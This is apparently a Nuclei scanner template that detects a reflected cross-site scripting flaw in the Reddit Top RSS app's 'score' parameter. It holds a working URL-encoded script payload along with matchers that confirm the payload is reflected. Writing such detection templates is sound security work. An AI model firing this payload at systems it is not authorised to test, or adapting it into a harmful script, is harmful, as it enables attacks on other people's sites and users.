id: reddittop-rss-xss

info:
  name: Reddit Top RSS - Cross-Site Scripting
  author: arafatansari
  severity: high
  description: |
    Reddit Top RSS contains a cross-site scripting vulnerability via the /?subreddit=news&score= parameter.
  reference:
    - https://github.com/johnwarne/reddit-top-rss/issues/12
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
  tags: reddit,rss,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/?subreddit=news&score=2134%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value="2134"><script>alert(document.domain)</script>" min="0"'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 490a0046304402206c5d671dca881b41f94d956517dc32c9e7b4b0e75b9ded97b77dcffe1bf765e702206ce148e2161cdba48c915a46120af7a893ccc3190e54c3152139c7758769b3f0:922c64590222798bb761d5b6d8e72950
